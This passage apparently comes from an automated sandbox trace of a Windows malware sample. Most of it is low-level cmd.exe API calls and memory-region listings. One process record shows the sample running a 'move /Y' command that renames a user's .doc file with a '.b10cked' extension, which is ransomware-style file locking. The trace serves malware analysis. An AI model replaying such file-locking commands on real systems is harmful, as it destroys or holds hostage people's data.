0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.549] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.549] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.551] GetFileType (hFile=0x4c) returned 0x1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.551] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.551] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.551] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.551] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.551] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.551] GetFileType (hFile=0x4c) returned 0x1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.551] GetFileType (hFile=0x4c) returned 0x1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.551] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.645] GetFileType (hFile=0x4c) returned 0x1 [0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.645] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.645] GetFileType (hFile=0x4c) returned 0x1 [0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.645] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] GetFileType (hFile=0x4c) returned 0x1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] GetFileType (hFile=0x4c) returned 0x1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] GetFileType (hFile=0x4c) returned 0x1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] GetFileType (hFile=0x4c) returned 0x1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.647] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] GetFileType (hFile=0x4c) returned 0x1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] GetFileType (hFile=0x4c) returned 0x1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] GetFileType (hFile=0x4c) returned 0x1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.648] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.649] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x32, lpOverlapped=0x0) returned 1 [0139.649] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.649] GetFileType (hFile=0x4c) returned 0x1 [0139.649] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.649] GetFileType (hFile=0x4c) returned 0x1 [0139.649] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.649] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x32, lpOverlapped=0x0) returned 1 [0139.649] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.649] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.649] _close (_FileHandle=4) returned 0 [0139.649] FindNextFileW (in: hFindFile=0x290ee0, lpFindFileData=0x22f3e4 | out: lpFindFileData=0x22f3e4) returned 0 [0139.650] GetLastError () returned 0x12 [0139.650] FindClose (in: hFindFile=0x290ee0 | out: hFindFile=0x290ee0) returned 1 [0139.650] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0139.651] _close (_FileHandle=3) returned 0 [0139.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.651] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.651] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.651] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.651] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.652] SetConsoleInputExeNameW () returned 0x1 [0139.652] GetConsoleOutputCP () returned 0x1b5 [0139.652] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.652] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.652] exit (_Code=0) Process: id = "149" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xd40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14526 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14527 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14528 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14529 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 14530 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14531 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14532 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14533 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14534 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14535 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15522 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15523 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15524 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15525 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 15526 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 15527 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15528 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15529 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15530 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15531 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15532 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15533 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15534 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15535 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15536 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15537 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15538 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15539 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 15540 start_va = 0x3a0000 end_va = 0x3a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 15541 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 15542 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 15543 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 15544 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15545 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 206 os_tid = 0xd30 [0140.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fde4 | out: lpSystemTimeAsFileTime=0x28fde4*(dwLowDateTime=0x8d7615e0, dwHighDateTime=0x1d440a9)) [0140.130] GetCurrentProcessId () returned 0xd40 [0140.130] GetCurrentThreadId () returned 0xd30 [0140.130] GetTickCount () returned 0x2c051 [0140.130] QueryPerformanceCounter (in: lpPerformanceCount=0x28fddc | out: lpPerformanceCount=0x28fddc*=19691938228) returned 1 [0140.131] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.131] __set_app_type (_Type=0x1) [0140.131] __p__fmode () returned 0x76b331f4 [0140.131] __p__commode () returned 0x76b331fc [0140.131] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.131] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.131] GetCurrentThreadId () returned 0xd30 [0140.131] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd30) returned 0x38 [0140.131] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.131] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.131] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.131] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.131] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fd74 | out: phkResult=0x28fd74*=0x0) returned 0x2 [0140.132] VirtualQuery (in: lpAddress=0x28fdab, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.132] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.132] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.132] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.132] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.132] GetConsoleOutputCP () returned 0x1b5 [0140.132] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.132] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.132] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.132] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.132] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.132] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.132] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.133] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.133] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.133] GetEnvironmentStringsW () returned 0x3c0218* [0140.133] FreeEnvironmentStringsW (penv=0x3c0218) returned 1 [0140.133] GetEnvironmentStringsW () returned 0x3c0218* [0140.133] FreeEnvironmentStringsW (penv=0x3c0218) returned 1 [0140.133] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ece4 | out: phkResult=0x28ece4*=0x40) returned 0x0 [0140.133] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0xa8, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.133] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x1, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x1, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, 